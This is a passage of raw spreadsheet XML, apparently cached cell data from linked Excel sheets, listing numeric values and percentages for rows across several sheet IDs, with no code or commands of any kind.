            <v>213.747253602142</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>8.00</v>
          </cell>
          <cell r="R72" t="str">
            <v>262.08</v>
          </cell>
          <cell r="S72" t="str">
            <v>4330.58</v>
          </cell>
          <cell r="T72">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U72">
            <v>64.2352941176471</v>
          </cell>
          <cell r="V72">
            <v>51.4076448243115</v>
          </cell>
          <cell r="W72">
            <v>63.125</v>
          </cell>
          <cell r="X72">
            <v>63.1333943833944</v>
          </cell>
          <cell r="Y72">
            <v>61.3961640242185</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>8.00</v>
          </cell>
          <cell r="R73" t="str">
            <v>262.08</v>
          </cell>
          <cell r="S73" t="str">
            <v>4458.30</v>
          </cell>
          <cell r="T73">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U73">
            <v>64.2352941176471</v>
          </cell>
          <cell r="V73">
            <v>52.9237891737892</v>
          </cell>
          <cell r="W73">
            <v>65.75</v>
          </cell>
          <cell r="X73">
            <v>60.5235042735043</v>
          </cell>
          <cell r="Y73">
            <v>62.7760020635668</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="17">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0.621</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0.621</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>14000</v>
          </cell>
          <cell r="Q8">
            <v>8478.836</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>798</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>6217.516</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>60437.506</v>
          </cell>
          <cell r="E13">
            <v>6550</v>
          </cell>
        </row>
        <row r="13">
          <cell r="I13">
            <v>6119</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>72130.266</v>
          </cell>
        </row>
        <row r="14">
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
          <cell r="E16">
            <v>7786</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>5504.13</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>65981.82</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>8364.38</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
          <cell r="E18">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="I18">
            <v>314.96</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
            <v>18190.3</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
          <cell r="E19">
            <v>7786</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>4413.67</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>22631.41</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
          <cell r="E20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>775.5</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>16795.73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291</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>4218.457</v>
          </cell>
        </row>
        <row r="50">
          <cell r="E50">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="I50">
            <v>2403.05</v>
          </cell>
        </row>
        <row r="64">
          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R68" t="str">
            <v>346.00</v>
          </cell>
          <cell r="S68" t="str">
            <v>6081.53</v>
          </cell>
          <cell r="T68">
            <v>100</v>
          </cell>
          <cell r="U68">
            <v>80.0925925925926</v>
          </cell>
          <cell r="V68">
            <v>71.9878077651515</v>
          </cell>
          <cell r="W68">
            <v>272.916666666667</v>
          </cell>
          <cell r="X68">
            <v>263.35549132948</v>
          </cell>
          <cell r="Y68">
            <v>266.209983343007</v>
          </cell>
        </row>
        <row r="69">
          <cell r="Q69" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R69" t="str">
            <v>336.32</v>
          </cell>
          <cell r="S69" t="str">
            <v>5817.20</v>
          </cell>
          <cell r="T69">
            <v>100</v>
          </cell>
          <cell r="U69">
            <v>77.8518518518518</v>
          </cell>
          <cell r="V69">
            <v>68.8589015151515</v>
          </cell>
          <cell r="W69">
            <v>22.6916030534351</v>
          </cell>
          <cell r="X69">
            <v>22.6815003035686</v>
          </cell>
          <cell r="Y69">
            <v>25.2216957355224</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R71" t="str">
            <v>239.42</v>
          </cell>
          <cell r="S71" t="str">
            <v>4265.92</v>
          </cell>
          <cell r="T71">
            <v>100</v>
          </cell>
          <cell r="U71">
            <v>55.4212962962963</v>
          </cell>
          <cell r="V71">
            <v>50.4962121212121</v>
          </cell>
          <cell r="W71">
            <v>219.916666666667</v>
          </cell>
          <cell r="X71">
            <v>218.515579316682</v>
          </cell>
          <cell r="Y71">
            <v>213.781962624709</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>16.00</v>
          </cell>
          <cell r="R72" t="str">
            <v>278.08</v>
          </cell>
          <cell r="S72" t="str">
            <v>4346.58</v>
          </cell>
          <cell r="T72">
            <v>66.6666666666667</v>
          </cell>
          <cell r="U72">
            <v>64.3703703703704</v>
          </cell>
          <cell r="V72">
            <v>51.4509943181818</v>
          </cell>
          <cell r="W72">
            <v>62.75</v>
          </cell>
          <cell r="X72">
            <v>63.111334867664</v>
          </cell>
          <cell r="Y72">
            <v>61.4011475688932</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R73" t="str">
            <v>286.08</v>
          </cell>
          <cell r="S73" t="str">
            <v>4482.30</v>
          </cell>
          <cell r="T73">
            <v>100</v>
          </cell>
          <cell r="U73">
            <v>66.2222222222222</v>
          </cell>
          <cell r="V73">
            <v>53.0575284090909</v>
          </cell>
          <cell r="W73">
            <v>62.6666666666667</v>
          </cell>
          <cell r="X73">
            <v>60.7032997762864</v>
          </cell>
          <cell r="Y73">
            <v>62.7754166387792</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="18">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0.621</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0.621</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>14000</v>
          </cell>
          <cell r="Q8">
            <v>8478.836</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>790</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>5427.516</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>60437.506</v>
          </cell>
          <cell r="E13">
            <v>6501</v>
          </cell>
        </row>
        <row r="13">
          <cell r="I13">
            <v>3786</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>72702.376</v>
          </cell>
        </row>
        <row r="14">
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
          <cell r="E16">
            <v>5198</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>4892.74</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>66287.08</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>97.7000000000003</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>8266.68</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
          <cell r="E18">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="I18">
            <v>376.14</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
            <v>17814.16</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
          <cell r="E19">
            <v>5098</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>4049.9</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>23679.51</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
          <cell r="E20">
            <v>100</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>369</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>16526.73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161</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>4057.457</v>
          </cell>
        </row>
        <row r="50">
          <cell r="E50">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="I50">
            <v>2142.89</v>
          </cell>
        </row>
        <row r="64">
          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R68" t="str">
            <v>370.00</v>
          </cell>
          <cell r="S68" t="str">
            <v>6105.53</v>
          </cell>
          <cell r="T68">
            <v>100</v>
          </cell>
          <cell r="U68">
            <v>81.140350877193</v>
          </cell>
          <cell r="V68">
            <v>72.0671624173749</v>
          </cell>
          <cell r="W68">
            <v>270.875</v>
          </cell>
          <cell r="X68">
            <v>263.843243243243</v>
          </cell>
          <cell r="Y68">
            <v>266.228320882872</v>
          </cell>
        </row>
        <row r="69">
          <cell r="Q69" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R69" t="str">
            <v>360.32</v>
          </cell>
          <cell r="S69" t="str">
            <v>5841.20</v>
          </cell>
          <cell r="T69">
            <v>100</v>
          </cell>
          <cell r="U69">
            <v>79.0175438596491</v>
          </cell>
          <cell r="V69">
            <v>68.947119924457</v>
          </cell>
          <cell r="W69">
            <v>21.8860175357637</v>
          </cell>
          <cell r="X69">
            <v>22.6273168278449</v>
          </cell>
          <cell r="Y69">
            <v>25.2078422382299</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>8.42</v>
          </cell>
          <cell r="R71" t="str">
            <v>247.83</v>
          </cell>
          <cell r="S71" t="str">
            <v>4274.33</v>
          </cell>
          <cell r="T71">
            <v>35.0833333333333</v>
          </cell>
          <cell r="U71">
            <v>54.3486842105263</v>
          </cell>
          <cell r="V71">
            <v>50.4524315391879</v>
          </cell>
          <cell r="W71">
            <v>235.866983372922</v>
          </cell>
          <cell r="X71">
            <v>219.113908727757</v>
          </cell>
          <cell r="Y71">
            <v>213.825968046454</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R72" t="str">
            <v>302.08</v>
          </cell>
          <cell r="S72" t="str">
            <v>4370.58</v>
          </cell>
          <cell r="T72">
            <v>100</v>
          </cell>
          <cell r="U72">
            <v>66.2456140350877</v>
          </cell>
          <cell r="V72">
            <v>51.5885269121813</v>
          </cell>
          <cell r="W72">
            <v>69.0416666666667</v>
          </cell>
          <cell r="X72">
            <v>63.5824947033898</v>
          </cell>
          <cell r="Y72">
            <v>61.443103661299</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R73" t="str">
            <v>310.08</v>
          </cell>
          <cell r="S73" t="str">
            <v>4506.30</v>
          </cell>
          <cell r="T73">
            <v>100</v>
          </cell>
          <cell r="U73">
            <v>68</v>
          </cell>
          <cell r="V73">
            <v>53.1905099150142</v>
          </cell>
          <cell r="W73">
            <v>64.7916666666667</v>
          </cell>
          <cell r="X73">
            <v>61.0197368421053</v>
          </cell>
          <cell r="Y73">
            <v>62.7861549386415</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="19">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0.621</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0.621</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>14000</v>
          </cell>
          <cell r="Q8">
            <v>8478.836</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>703</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>4724.516</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>60437.506</v>
          </cell>
          <cell r="E13">
            <v>5452</v>
          </cell>
        </row>
        <row r="13">
          <cell r="I13">
            <v>2714</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>74639.736</v>
          </cell>
        </row>
        <row r="14">
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
          <cell r="E16">
            <v>4182</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>4704.27</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>65764.81</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>43.54</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>8223.14</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
          <cell r="E18">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="I18">
            <v>187.28</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
            <v>17626.88</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
          <cell r="E19">
            <v>1520</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>3549.95</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>21649.56</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
          <cell r="E20">
            <v>2662</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>923.5</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>18265.23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178</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>3879.457</v>
          </cell>
        </row>
        <row r="50">
          <cell r="E50">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="I50">
            <v>800.639999999999</v>
          </cell>
        </row>
        <row r="64">
          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>20.97</v>
          </cell>
          <cell r="R68" t="str">
            <v>390.97</v>
          </cell>
          <cell r="S68" t="str">
            <v>6126.50</v>
          </cell>
          <cell r="T68">
            <v>87.375</v>
          </cell>
          <cell r="U68">
            <v>81.4520833333333</v>
          </cell>
          <cell r="V68">
            <v>72.1104048964218</v>
          </cell>
          <cell r="W68">
            <v>259.99046256557</v>
          </cell>
          <cell r="X68">
            <v>263.636596158273</v>
          </cell>
          <cell r="Y68">
            <v>266.206969721701</v>
          </cell>
        </row>
        <row r="69">
          <cell r="Q69" t="str">
            <v>21.33</v>
          </cell>
          <cell r="R69" t="str">
            <v>381.65</v>
          </cell>
          <cell r="S69" t="str">
            <v>5862.53</v>
          </cell>
          <cell r="T69">
            <v>88.875</v>
          </cell>
          <cell r="U69">
            <v>79.5104166666667</v>
          </cell>
          <cell r="V69">
            <v>69.0034133709981</v>
          </cell>
          <cell r="W69">
            <v>21.9844093910492</v>
          </cell>
          <cell r="X69">
            <v>22.5925764408544</v>
          </cell>
          <cell r="Y69">
            <v>25.1966540548776</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>13.00</v>
          </cell>
          <cell r="R71" t="str">
            <v>260.83</v>
          </cell>
          <cell r="S71" t="str">
            <v>4287.33</v>
          </cell>
          <cell r="T71">
            <v>54.1666666666667</v>
          </cell>
          <cell r="U71">
            <v>54.3395833333333</v>
          </cell>
          <cell r="V71">
            <v>50.4629237288136</v>
          </cell>
          <cell r="W71">
            <v>204.769230769231</v>
          </cell>
          <cell r="X71">
            <v>218.398957175172</v>
          </cell>
          <cell r="Y71">
            <v>213.79850629646</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>11.25</v>
          </cell>
          <cell r="R72" t="str">
            <v>313.33</v>
          </cell>
          <cell r="S72" t="str">
            <v>4381.83</v>
          </cell>
          <cell r="T72">
            <v>46.875</v>
          </cell>
          <cell r="U72">
            <v>65.2770833333333</v>
          </cell>
          <cell r="V72">
            <v>51.5752118644068</v>
          </cell>
          <cell r="W72">
            <v>68.8</v>
          </cell>
          <cell r="X72">
            <v>63.7698273385887</v>
          </cell>
          <cell r="Y72">
            <v>61.4619919074907</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>11.25</v>
          </cell>
          <cell r="R73" t="str">
            <v>321.33</v>
          </cell>
          <cell r="S73" t="str">
            <v>4517.55</v>
          </cell>
          <cell r="T73">
            <v>46.875</v>
          </cell>
          <cell r="U73">
            <v>66.94375</v>
          </cell>
          <cell r="V73">
            <v>53.1726694915254</v>
          </cell>
          <cell r="W73">
            <v>66.3111111111111</v>
          </cell>
          <cell r="X73">
            <v>61.2049917530265</v>
          </cell>
          <cell r="Y73">
            <v>62.7949330942657</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="20">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2121</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>71867.796</v>
          </cell>
        </row>
        <row r="14">
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
          <cell r="E16">
            <v>3197</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>4133.90000000001</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>64827.91</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>141.7</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>8081.44</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
          <cell r="E18">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="I18">
            <v>107.46</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
            <v>17519.42</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
          <cell r="E19">
            <v>1183</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>3120.74000000001</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>19711.82</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
          <cell r="E20">
            <v>2014</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>764</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>19515.23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138</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>3741.457</v>
          </cell>
        </row>
        <row r="50">
          <cell r="E50">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="I50">
            <v>650.939999999999</v>
          </cell>
        </row>
        <row r="64">
          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R68" t="str">
            <v>390.97</v>
          </cell>
          <cell r="S68" t="str">
            <v>6126.50</v>
          </cell>
          <cell r="T68">
            <v>0</v>
          </cell>
          <cell r="U68">
            <v>77.5734126984127</v>
          </cell>
          <cell r="V68">
            <v>71.9072769953052</v>
          </cell>
          <cell r="W68">
            <v>0</v>
          </cell>
          <cell r="X68">
            <v>263.636596158273</v>
          </cell>
          <cell r="Y68">
            <v>266.206969721701</v>
          </cell>
        </row>
        <row r="69">
          <cell r="Q69" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R69" t="str">
            <v>381.65</v>
          </cell>
          <cell r="S69" t="str">
            <v>5862.53</v>
          </cell>
          <cell r="T69">
            <v>0</v>
          </cell>
          <cell r="U69">
            <v>75.7242063492063</v>
          </cell>
          <cell r="V69">
            <v>68.8090375586854</v>
          </cell>
          <cell r="W69">
            <v>0</v>
          </cell>
          <cell r="X69">
            <v>22.5925764408544</v>
          </cell>
          <cell r="Y69">
            <v>25.1966540548776</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>8.67</v>
          </cell>
          <cell r="R71" t="str">
            <v>269.50</v>
          </cell>
          <cell r="S71" t="str">
            <v>4296.00</v>
          </cell>
          <cell r="T71">
            <v>36.125</v>
          </cell>
          <cell r="U71">
            <v>53.4722222222222</v>
          </cell>
          <cell r="V71">
            <v>50.4225352112676</v>
          </cell>
          <cell r="W71">
            <v>232.295271049596</v>
          </cell>
          <cell r="X71">
            <v>218.846011131725</v>
          </cell>
          <cell r="Y71">
            <v>213.83583566108</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>8.83</v>
          </cell>
          <cell r="R72" t="str">
            <v>322.17</v>
          </cell>
          <cell r="S72" t="str">
            <v>4390.67</v>
          </cell>
          <cell r="T72">
            <v>36.7916666666667</v>
          </cell>
          <cell r="U72">
            <v>63.9226190476191</v>
          </cell>
          <cell r="V72">
            <v>51.5336854460094</v>
          </cell>
          <cell r="W72">
            <v>67.836919592299</v>
          </cell>
          <cell r="X72">
            <v>63.8793183722879</v>
          </cell>
          <cell r="Y72">
            <v>61.4746724304036</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>8.83</v>
          </cell>
          <cell r="R73" t="str">
            <v>330.17</v>
          </cell>
          <cell r="S73" t="str">
            <v>4526.38</v>
          </cell>
          <cell r="T73">
            <v>36.7916666666667</v>
          </cell>
          <cell r="U73">
            <v>65.5099206349206</v>
          </cell>
          <cell r="V73">
            <v>53.1265258215962</v>
          </cell>
          <cell r="W73">
            <v>66.1381653454134</v>
          </cell>
          <cell r="X73">
            <v>61.3350698125208</v>
          </cell>
          <cell r="Y73">
            <v>62.8014550258706</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="21">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1799</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>70068.796</v>
          </cell>
        </row>
        <row r="14">
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
          <cell r="E16">
            <v>2716</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>5158.44</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>62385.47</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>354.52</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>7726.92</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
          <cell r="E18">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="I18">
            <v>156.51</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
            <v>17362.91</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
          <cell r="E19">
            <v>1065</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>4033.41</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>16743.41</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
          <cell r="E20">
            <v>1651</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>614</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>20552.23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173.9</v>
          </cell>
        </row>
        <row r="29">
          <cell r="V29">
            <v>116</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>3799.357</v>
          </cell>
        </row>
        <row r="50">
          <cell r="E50">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="I50">
            <v>0</v>
          </cell>
        </row>
        <row r="64">
          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R68" t="str">
            <v>390.97</v>
          </cell>
          <cell r="S68" t="str">
            <v>6126.50</v>
          </cell>
          <cell r="T68">
            <v>0</v>
          </cell>
          <cell r="U68">
            <v>74.0473484848485</v>
          </cell>
          <cell r="V68">
            <v>71.7052902621723</v>
          </cell>
          <cell r="W68">
            <v>0</v>
          </cell>
          <cell r="X68">
            <v>263.636596158273</v>
          </cell>
          <cell r="Y68">
            <v>266.206969721701</v>
          </cell>
        </row>
        <row r="69">
          <cell r="Q69" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R69" t="str">
            <v>381.65</v>
          </cell>
          <cell r="S69" t="str">
            <v>5862.53</v>
          </cell>
          <cell r="T69">
            <v>0</v>
          </cell>
          <cell r="U69">
            <v>72.282196969697</v>
          </cell>
          <cell r="V69">
            <v>68.6157537453184</v>
          </cell>
          <cell r="W69">
            <v>0</v>
          </cell>
          <cell r="X69">
            <v>22.5925764408544</v>
          </cell>
          <cell r="Y69">
            <v>25.1966540548776</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>8.00</v>
          </cell>
          <cell r="R71" t="str">
            <v>277.50</v>
          </cell>
          <cell r="S71" t="str">
            <v>4304.00</v>
          </cell>
          <cell r="T71">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U71">
            <v>52.5568181818182</v>
          </cell>
          <cell r="V71">
            <v>50.374531835206</v>
          </cell>
          <cell r="W71">
            <v>206.375</v>
          </cell>
          <cell r="X71">
            <v>218.486486486486</v>
          </cell>
          <cell r="Y71">
            <v>213.821967936803</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>8.00</v>
          </cell>
          <cell r="R72" t="str">
            <v>330.17</v>
          </cell>
          <cell r="S72" t="str">
            <v>4398.67</v>
          </cell>
          <cell r="T72">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U72">
            <v>62.532196969697</v>
          </cell>
          <cell r="V72">
            <v>51.4825608614232</v>
          </cell>
          <cell r="W72">
            <v>67.875</v>
          </cell>
          <cell r="X72">
            <v>63.9761335069812</v>
          </cell>
          <cell r="Y72">
            <v>61.48631290822</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>8.00</v>
          </cell>
          <cell r="R73" t="str">
            <v>338.17</v>
          </cell>
          <cell r="S73" t="str">
            <v>4534.38</v>
          </cell>
          <cell r="T73">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U73">
            <v>64.0473484848485</v>
          </cell>
          <cell r="V73">
            <v>53.0709269662921</v>
          </cell>
          <cell r="W73">
            <v>65.25</v>
          </cell>
          <cell r="X73">
            <v>61.4276843007955</v>
          </cell>
          <cell r="Y73">
            <v>62.8057749901861</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="22">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2792</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>67276.796</v>
          </cell>
        </row>
        <row r="14">
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
          <cell r="E16">
            <v>3723</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>5281.49</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>60826.98</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>250.74</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>7476.18</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
          <cell r="E18">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="I18">
            <v>339.2</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
